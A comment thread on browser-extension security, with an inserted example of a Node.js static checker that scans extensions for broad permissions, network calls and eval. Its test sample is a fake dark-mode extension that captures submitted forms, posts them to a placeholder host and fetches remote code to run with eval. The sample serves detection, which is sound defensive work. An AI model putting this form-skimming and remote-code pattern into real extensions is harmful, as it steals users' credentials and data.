It would be interesting if you could easily install browser extensions via a source repository URL (e.g. GitHub, or any git URL), then at least there would be more transparency about who/what you are trusting by installing it. Blindly trusting a mostly anonymous chrome store "install" button seems insane, since they don't do any significant policing. Wasn't the promise of safety one of the primary reasons Google started the chrome store?
Keep in mind, extensions can update themselves at any time
GP suggested only installing extensions you can build yourself from source. Most extensions that auto update do so via the Chrome store. If you install an extension from source, that won't happen.
EGreg|10 months ago
Keep in mind, extensions can update themselves at any time, including when they're bought out by someone else. In fact, I bet that's a huge draw... imagine buying an extension that "can read and modify data on all your websites" and then pushing an update that, oh I dunno, exfiltrates everyone's passwords from their Gmail. How would most people even catch that?
DO NOT have any extensions running by default except "on click".
There should be at least some kind of static checker of extensions for their calls to fetch or other network APIs. The Web is just too permissive with updating code, you've got eval and much more. It would be great if browsers had only a narrow bottleneck through which code could be updated, and would ask the user first.
(That wouldn't really solve everything since there can be sleeper code that is "switched on" with certain data coming over the wire, but better than what we have now.)
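Something close to the static checker EGreg asks for above, as an added example that is not code from the thread: a Node script that takes an unpacked extension (manifest plus scripts), flags broad host access, outbound network sinks (fetch, XMLHttpRequest, WebSocket, sendBeacon) and runtime code loading (eval, new Function, importScripts, injected script tags), and says whether a human should look before installing. The extension names, file names and example.invalid hostnames are constructed for illustration, and the sample extension is held in memory rather than read from disk. It is a regex heuristic, so it catches the blatant case and, exactly as the comment's caveat says, not obfuscated or sleeper code that only activates on data that arrives later.

```javascript
// Added example (not from the thread): regex-based static checker for an
// unpacked browser extension. Heuristic only; obfuscated or sleeper code evades it.

const NETWORK_PATTERNS = [
  { name: "fetch()", re: /\bfetch\s*\(/g },
  { name: "XMLHttpRequest", re: /\bXMLHttpRequest\b/g },
  { name: "WebSocket", re: /\bnew\s+WebSocket\s*\(/g },
  { name: "navigator.sendBeacon", re: /\bsendBeacon\s*\(/g },
];

const DYNAMIC_CODE_PATTERNS = [
  { name: "eval()", re: /\beval\s*\(/g },
  { name: "new Function()", re: /\bnew\s+Function\s*\(/g },
  { name: "importScripts()", re: /\bimportScripts\s*\(/g },
  { name: "injected <script>", re: /createElement\s*\(\s*['"]script['"]\s*\)/g },
];

// Host patterns that amount to "read and modify data on all your websites".
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

function lineOf(src, index) {
  return src.slice(0, index).split("\n").length;
}

// Scan one script for network and dynamic-code sinks; one finding per hit.
function scanSource(file, src) {
  const findings = [];
  for (const [kind, patterns] of [["network", NETWORK_PATTERNS], ["dynamic-code", DYNAMIC_CODE_PATTERNS]]) {
    for (const { name, re } of patterns) {
      re.lastIndex = 0;
      let m;
      while ((m = re.exec(src)) !== null) {
        findings.push({ kind, what: name, file, line: lineOf(src, m.index) });
      }
    }
  }
  return findings;
}

// Host access comes from MV2 permissions, MV3 host_permissions and content_scripts.
function scanManifest(manifest) {
  const hosts = [
    ...(manifest.host_permissions || []),
    ...(manifest.permissions || []).filter((p) => p === "<all_urls>" || p.includes("://")),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  const findings = hosts
    .filter((h) => BROAD_HOSTS.has(h))
    .map((h) => ({ kind: "permissions", what: `broad host access ${h}`, file: "manifest.json", line: 0 }));
  if (manifest.update_url) {
    findings.push({ kind: "update", what: `self-hosted update_url ${manifest.update_url}`, file: "manifest.json", line: 0 });
  }
  return findings;
}

function scanExtension(ext) {
  const findings = scanManifest(ext.manifest);
  for (const [file, src] of Object.entries(ext.files)) findings.push(...scanSource(file, src));
  return findings;
}

// Runtime code loading always needs a human look; so does broad site access
// combined with any outbound channel.
function needsManualReview(findings) {
  const has = (k) => findings.some((f) => f.kind === k);
  return has("dynamic-code") || (has("permissions") && has("network"));
}

// Constructed sample: a "dark mode" extension whose background worker phones home.
const SAMPLE_EXTENSION = {
  manifest: {
    manifest_version: 3, name: "Dark Mode Everywhere", version: "2.1.0",
    permissions: ["storage", "tabs"], host_permissions: ["<all_urls>"],
    background: { service_worker: "bg.js" },
    content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
  },
  files: {
    "content.js": `// looks harmless: apply a dark theme
document.documentElement.style.filter = "invert(1)";
// quietly forward every submitted form to the background worker
document.addEventListener("submit", (e) => {
  chrome.runtime.sendMessage({ fields: Object.fromEntries(new FormData(e.target)) });
});
`,
    "bg.js": `chrome.runtime.onMessage.addListener((msg) => {
  fetch("https://example.invalid/collect", { method: "POST", body: JSON.stringify(msg) });
});
// "sleeper" path: pull code over the wire and run it
fetch("https://example.invalid/config").then((r) => r.text()).then((code) => eval(code));
`,
  },
};

// Constructed benign sample: one site, no network, no dynamic code.
const BENIGN_EXTENSION = {
  manifest: {
    manifest_version: 3, name: "HN Font Fix", version: "1.0", permissions: ["storage"],
    content_scripts: [{ matches: ["https://news.ycombinator.com/*"], js: ["content.js"] }],
  },
  files: { "content.js": `document.body.style.fontFamily = "system-ui";\n` },
};

const report = scanExtension(SAMPLE_EXTENSION);
for (const f of report) console.log(`${f.file}:${f.line} [${f.kind}] ${f.what}`);
console.log(needsManualReview(report) ? "verdict: manual review before install" : "verdict: no obvious sinks");
```

Run with `node checker.js`; for a real extension, replace the in-memory objects with `JSON.parse(fs.readFileSync("manifest.json"))` and the scripts it lists. The interesting part of the verdict is the combination, not any single hit: a content script on every site plus one `fetch` in the background worker is the shape of the password-exfiltration update the comment describes.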
metadat|10 months ago
rahimnathwani|10 months ago
arresin|10 months ago
You’d be surprised. It describes all the extensions I use.